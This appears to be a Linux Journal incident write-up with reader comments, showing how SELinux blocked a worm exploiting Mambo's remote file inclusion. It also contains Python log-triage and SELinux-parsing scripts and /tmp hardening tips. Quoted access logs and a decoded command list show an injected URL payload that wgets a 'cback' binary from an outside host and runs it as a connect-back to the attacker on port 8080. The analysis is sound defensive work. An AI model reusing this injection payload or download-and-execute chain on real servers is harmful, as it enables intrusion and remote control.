Mambo Exploit Blocked by SELinux
Listing 2. Attack Traces in Web Server Access Log
# grep 10.9.233.25 /root/exploit.log
/var/log/httpd/access_log:10.9.233.25 - - [04/May/2006:07:52:21 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;wget%20172.16.31.57/cback;chmod%20744%20cback;./cback%2010.200.238.39%208080;echo%20YYY;echo| HTTP/1.1" 200 594 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
/var/log/httpd/access_log:10.9.233.25 - - [04/May/2006:07:52:24 -0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;wget%20172.16.31.57/cback;chmod%20744%20cback;./cback%2010.200.238.39%208080;echo%20YYY;echo| HTTP/1.1" 404 294 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
/var/log/httpd/access_log:10.9.233.25 - - [04/May/2006:07:52:25 -0400] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;wget%20172.16.31.57/cback;chmod%20744%20cback;./cback%2010.200.238.39%208080;echo%20YYY;echo| HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
/var/log/httpd/access_log:10.9.233.25 - - [04/May/2006:07:52:27 -0400] "POST /xmlrpc.php HTTP/1.1" 404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
The log file did contain two very useful clues; it confirmed that the cback binary was related to a request made to Mambo. Furthermore, the query string confirmed that the attacker used wget, a command-line URL-fetching tool, to retrieve the exploit from a remote server. The Web server request attempted to execute the cback executable with an IP address parameter of 10.200.238.39, presumably another machine under the control of the attacker.
The attack attempted to execute this sequence of shell commands:
cd /tmp
wget 172.16.31.57/cback
chmod 744 cback
./cback 10.200.238.39 8080
echo YYY
echo| HTTP/1.1
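The decoding above can be automated for triage. As an added example (not code from the article), this Python script parses access-log lines like those in Listing 2, recognises the remote-include override of mosConfig_absolute_path, and URL-decodes the cmd parameter back into the command chain listed above; the sample lines and the field names it returns are my own construction.

```python
"""Decode a Mambo remote-include request like those in Listing 2 and recover the
shell command chain carried in the cmd parameter. Added example; SAMPLE_LOG is
constructed after Listing 2 and is not a real capture."""
import re
from urllib.parse import urlsplit, unquote

SAMPLE_LOG = "\n".join([
    '10.9.233.25 - - [04/May/2006:07:52:24 -0400] "GET /mambo/index2.php?'
    '_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&'
    'mosConfig_absolute_path=http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;'
    'wget%20172.16.31.57/cback;chmod%20744%20cback;'
    './cback%2010.200.238.39%208080;echo%20YYY;echo| HTTP/1.1" 404 294 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
    '10.9.233.25 - - [04/May/2006:07:52:27 -0400] "POST /xmlrpc.php HTTP/1.1" '
    '404 288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"',
])

# Combined Log Format: client, ident, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def parse_query(query):
    """Split on '&' only: the cmd value itself uses ';' as a shell separator."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            params[unquote(key)] = unquote(value)
    return params

def analyze_request(line):
    """Describe one access-log line, or return None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = parse_query(url.query)
    include = params.get("mosConfig_absolute_path", "")
    # The exploit points Mambo's include base at a remote URL (remote file inclusion)
    remote = include.startswith(("http://", "https://", "ftp://"))
    cmd = params.get("cmd", "")
    return {"client": m.group("ip"), "status": int(m.group("status")),
            "path": url.path, "remote_include": remote,
            "include_host": urlsplit(include).hostname if remote else None,
            "commands": [c.strip() for c in cmd.split(";") if c.strip()]}

def find_rfi_attempts(log_text):
    """Analysed requests that carry a remote include or a cmd chain."""
    return [r for r in map(analyze_request, log_text.splitlines())
            if r and (r["remote_include"] or r["commands"])]
```

Note that the 404 on the /mambo/ path is not a reason to relax: the first request in Listing 2 got a 200, so the status alone does not tell you whether the include ran.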
Going back to /var/log/messages, I searched for further suspicious SELinux enforcement messages. Listing 3 contains the lines that matched the times of the Web server attacks.
Listing 3. SELinux Audit Messages
May 4 07:52:24 targetbox kernel: audit(1146743544.910:2275): avc: denied { ioctl } for pid=9399 comm="wget" name="error_log" dev=dm-0 ino=1624085 scontext=user_u:system_r:httpd_sys_script_t tcontext=root:object_r:httpd_log_t tclass=file
May 4 07:52:24 targetbox kernel: audit(1146743544.911:2276): avc: denied { ioctl } for pid=9399 comm="wget" name="error_log" dev=dm-0 ino=1624085 scontext=user_u:system_r:httpd_sys_script_t tcontext=root:object_r:httpd_log_t tclass=file
May 4 07:52:27 targetbox kernel: audit(1146743547.060:2277): avc: denied { execute_no_trans } for pid=9401 comm="sh" name="cback" dev=dm-0 ino=852100 scontext=user_u:system_r:httpd_sys_script_t tcontext=user_u:object_r:httpd_sys_script_rw_t tclass=file
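The third denial is the one that stopped the attack: a process in the httpd_sys_script_t domain (the shell spawned by the PHP script) was refused execute_no_trans on a file of type httpd_sys_script_rw_t, a type the script domain is allowed to write. As an added example (not from the article), this Python parser breaks AVC lines like those in Listing 3 into fields and flags that write-then-execute pattern; the httpd_*/_rw_t heuristic and the sample messages are my own construction.

```python
"""Parse SELinux AVC denials like those in Listing 3 and flag a web-script domain
trying to execute a file in a type it is allowed to write. Added example, not
from the article; SAMPLE_MESSAGES is constructed after Listing 3."""
import re

SAMPLE_MESSAGES = "\n".join([
    'May 4 07:52:24 targetbox kernel: audit(1146743544.910:2275): avc: denied '
    '{ ioctl } for pid=9399 comm="wget" name="error_log" dev=dm-0 ino=1624085 '
    'scontext=user_u:system_r:httpd_sys_script_t '
    'tcontext=root:object_r:httpd_log_t tclass=file',
    'May 4 07:52:27 targetbox kernel: audit(1146743547.060:2277): avc: denied '
    '{ execute_no_trans } for pid=9401 comm="sh" name="cback" dev=dm-0 '
    'ino=852100 scontext=user_u:system_r:httpd_sys_script_t '
    'tcontext=user_u:object_r:httpd_sys_script_rw_t tclass=file',
    'May 4 07:53:01 targetbox kernel: unrelated message with no avc record',
])

AVC_RE = re.compile(r'audit\(\d+\.\d+:(?P<serial>\d+)\): avc: +(?P<result>denied|granted)'
                    r' +\{ (?P<perms>[^}]*)\} for (?P<rest>.*)$')
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_avc(line):
    """Return the AVC record as a dict, or None if the line is not an AVC message."""
    m = AVC_RE.search(line)
    if not m:
        return None
    rec = {"serial": int(m.group("serial")), "result": m.group("result"),
           "perms": m.group("perms").split()}
    rec.update((k, v.strip('"')) for k, v in KV_RE.findall(m.group("rest")))
    # A context is user:role:type[:level]; the type is what the policy reasons about
    rec["stype"] = rec.get("scontext", "::?").split(":")[2]
    rec["ttype"] = rec.get("tcontext", "::?").split(":")[2]
    return rec

def web_script_exec_from_writable(rec):
    """Heuristic (assumed, not from the article): an httpd_* domain denied execute
    on a *_rw_t type means a script tried to run something it could have written,
    which is exactly the cback case."""
    return (rec is not None and rec["result"] == "denied"
            and bool({"execute", "execute_no_trans"} & set(rec["perms"]))
            and rec["stype"].startswith("httpd_")
            and rec["ttype"].endswith("_rw_t"))

def triage(messages):
    """(serial, comm, name) for every denial that matches the pattern."""
    return [(r["serial"], r["comm"], r["name"])
            for r in map(parse_avc, messages.splitlines())
            if web_script_exec_from_writable(r)]
```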
This appeared to be a worm, because www.pkrinternet.com (on a different machine, but the same subnet) also had requests from 10.9.233.25 at around the same time, as Listing 4 shows.
Listing 4. Verification of Worm Activity on Nearby Server
$ grep 10.9.233.25 /var/log/httpd/www.pkrinternet.com-access_log
10.9.233.25 - - [04/May/2006:07:52:21 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;wget%20172.16.31.57/cback;chmod%20744%20cback;./cback%2010.200.238.39%208080;echo%20YYY;echo| HTTP/1.1" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
10.9.233.25 - - [04/May/2006:07:52:21 -0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://172.16.31.57/cmd.gif?&cmd=cd%20/tmp;wget%20172.16.31.57/cback;chmod%20744%20cback;./cback%2010.200.238.39%208080;echo%20YYY;echo| HTTP/1.1" 404 289 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
[ ...output trimmed ]
Lines showing further attacks similar to the trace on stockpot versus Mambo, xmlrpc.php, drupal and phpgroupware also appeared in this grep.
The worm made requests only to the default virtual host, so it's likely that the worm was not using the Host: virtual host header in its requests. This indicates that it was scanning IP subnets for vulnerable hosts, rather than working through a list of hostnames.
The modification time on the cback file was Feb 5, 2005. That was probably the modification time of the file on the remote system that wget retrieved. wget normally resets the modification time of files it downloads to match their original modification times. Listing 5 shows how to interrogate all the timestamps on a file.
Comments
An alternate defense against this attack
Kyle Wilson recently wrote me regarding this article, and gave me permission to share his remarks with Linux Journal readers:
________________________________________________________
Richard,
Hi. I just finished reading your article about SELinux in this month's Linux Journal. I enjoyed it very much. I thought I'd share a tip with you which I use to protect my Internet-facing servers. I always edit my fstab file to include the nosuid and noexec mount options for my tmp file system. In the case of the Mambo exploit which you wrote about, having the noexec mount option on /tmp would have also prevented the exploit by preventing the execution of the cback binary which was placed in your /tmp file system. Here's the description of the options from the mount man page:
noexec - Do not allow execution of any binaries on the mounted file system. This option might be useful for a server that has file systems containing binaries for architectures other than its own.
nosuid - Do not allow set-user-identifier or set-group-identifier bits to take effect. (This seems safe, but is in fact rather unsafe if you have suidperl(1) installed.)
Kyle
________________________________________________________
Kyle has some good points about protecting filesystems using mount options. That is a solid and time-honored way of helping to secure a system, to be sure. I've seen some systems that have many filesystem mount points that are locked down with noexec and nosuid options.
Many systems today (including the one I wrote about) only have two file systems by default, that is, a /boot and a / filesystem. This system was one of those. Locking down /tmp like that would also have protected from this specific attack, had SELinux not been activated:
# for /etc/fstab:
none /tmp tmpfs nosuid,noexec,rw,size=512m 0 0
However, other points of vulnerability also exist, such as /dev/shm, /var/tmp, and really, any writable file on your system. To be thorough about using nosuid and noexec options, you would need to ensure that these directories are also protected with these options. That is easy enough for /dev/shm, but not so easy for /var/tmp unless you dedicate a disk partition to it, or do funny tricks such as mounting a file on /var with the loop device and mounting that on /var/tmp. Even doing that is not proof against a determined attacker, as this shell code snippet illustrates:
# Try this out on your system to see how wide-open you could still be
# (-perm /0002 matches "other-writable"; GNU find no longer accepts the old +0002 form)
echo "World-writable directories:"
find / -type d -perm /0002
echo "World-writable files:"
find / -type f -perm /0002
One of the nice things about the Red Hat / Fedora SELinux targeted policies is that it stops attacks on pretty much all of these locations with a default-deny rule.
Correction: sentence below Listing 4
The sentence below Listing 4 should read:
Lines showing further attacks similar to the trace on targetbox versus Mambo, xmlrpc.php, drupal and phpgroupware also appeared in this grep.